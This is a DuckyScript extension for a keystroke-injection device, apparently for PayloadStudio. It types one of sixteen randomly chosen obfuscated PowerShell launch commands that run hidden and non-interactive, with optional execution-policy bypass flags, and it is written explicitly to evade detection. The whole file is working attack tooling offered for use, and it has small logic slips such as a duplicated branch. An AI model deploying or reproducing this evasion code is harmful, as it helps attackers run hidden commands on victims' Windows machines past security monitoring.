EXTENSION ROLLING_POWERSHELL_EXECUTION REM VERSION 1.0 REM Author: 0i41E REM OS: Windows REM Credits: Korben, Daniel Bohannon, Grzegorz Tworek REM Requirements: PayloadStudio v.1.3 minimum REM Starts Powershell in uncommon ways to avoid basic detection REM Via randomisation, obfuscation and usage of less used parameters, this extension helps to evade basic detection. REM CONFIGURATION: REM Add ExecutionPolicy bypass DEFINE #EXECUTIONPOLICY FALSE DEFINE #DELAY 200 $_RANDOM_MIN = 1 $_RANDOM_MAX = 16 VAR $RANDOM_PS = $_RANDOM_INT FUNCTION Rolling_Powershell_Execution() IF ($RANDOM_PS == 1) THEN STRING cmd.exe /c "p%PSModulePath:~21,1%weRshe%PUBLIC:~12,1%l.exe -noPr -Noni -wi Hid" ELSE IF ($RANDOM_PS == 2) THEN STRING cmd.exe /c "PowerShe%PUBLIC:~12,1%%PUBLIC:~12,1% /NoPr /NonI /w hi" ELSE IF ($RANDOM_PS == 3) THEN STRING cmd.exe /c "P%PSModulePath:~21,1%werShell /NoPr /NonI /w hi" ELSE IF ($RANDOM_PS == 4) THEN STRING cmd /c "FOR /F "delims=s\ t%PSModulePath:~25,1%kens=4" %a IN ('set^|findstr PSM')DO %a -nop -noni /w H" ELSE IF ($RANDOM_PS == 5) THEN STRING cmd /c "Powe%ALLUSERSPROFILE:~4,1%Shell -NoPr -NonI -w hi" ELSE IF ($RANDOM_PS == 6) THEN STRING cmd /c "p^Owe%ALLUSERSPROFILE:~7,1%Shell /NoPr /Nonin /wind hidD" ELSE IF ($RANDOM_PS == 7) THEN STRING cmd.exe /c "P%PSModulePath:~21,1%werShell -NoPr -NonI -w hi" ELSE IF ($RANDOM_PS == 8) THEN STRING powershell -NoPro -noninT -win h ELSE IF ($RANDOM_PS == 9) THEN STRING cmd /c "p^Owe%ALLUSERSPROFILE:~7,1%Shell -NoP -Noni -wind hidD" ELSE IF ($RANDOM_PS == 2) THEN STRING powershell.exe -NoP -nOni -W h ELSE IF ($RANDOM_PS == 10) THEN STRING cmd /c "FOR /F "delims=s\ tokens=4" %a IN ('set^|findstr PSM')DO %a -nop -noni -w H" ELSE IF ($RANDOM_PS == 11) THEN STRING powershell -nopr -noninT -W HiddEn ELSE IF ($RANDOM_PS == 12) THEN STRING cmd.exe /c "FOR /F "delims=s\ tokens=4" %a IN ('set^|findstr PSM')DO %a -noProF -nonin -win Hi" ELSE IF ($RANDOM_PS == 13) THEN STRING cmd /c "P%PSModulePath:~25,1%weRShell -noProf -NonIn -wi h" ELSE IF ($RANDOM_PS == 14) THEN STRING powershell -noproF -noni -W Hi ELSE IF ($RANDOM_PS == 15) THEN STRING cmd /c "Powe%ALLUSERSPROFILE:~4,1%Shell /NoPr /NonI /%PSModulePath:~17,1% hi" ELSE ($RANDOM_PS == 16) THEN STRING powershell.exe -noP -nOnI -windo H END_IF IF_DEFINED_TRUE #EXECUTIONPOLICY SPACE IF (($RANDOM_PS % 2) == 0) THEN STRING -ep ByPasS ELSE IF (($RANDOM_PS % 5) == 0) THEN STRING -exec bypass ELSE IF (($RANDOM_PS % 7) == 0) THEN STRING -exeC byPasS ELSE IF (($RANDOM_PS % 10) == 0) THEN STRING -exEcUtionPoL bYpaSs ELSE IF (($RANDOM_PS % 12) == 0) THEN STRING -exEcUtion bYPaSs ELSE STRING -eP BYPaSs END_IF END_IF_DEFINED ENTER DELAY #DELAY END_FUNCTION REM EXAMPLE USAGE AFTER EXTENSION REM DELAY 2000 REM GUI r REM DELAY 2000 REM Rolling_Powershell_Execution() END_EXTENSION